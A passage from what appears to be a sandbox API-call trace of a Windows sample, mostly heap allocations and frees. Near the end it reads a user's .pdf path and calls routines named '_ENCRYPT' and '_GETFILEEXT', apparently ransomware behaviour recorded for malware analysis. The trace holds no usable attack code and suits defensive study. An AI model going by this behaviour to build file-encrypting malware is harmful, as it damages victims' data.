out: lpWideCharStr=0x0) returned 70 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8c) returned 0x8ee038 [0172.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=70, lpWideCharStr=0x8ee038, cchWideChar=70 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf") returned 70 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.295] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.297] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0172.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0172.298] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.299] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.300] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0172.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba1b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.300] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0172.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0172.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.300] CloseHandle (hObject=0x120) returned 1 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.301] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.302] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0172.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0172.302] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0172.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.302] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0172.303] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.303] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0172.303] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.303] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 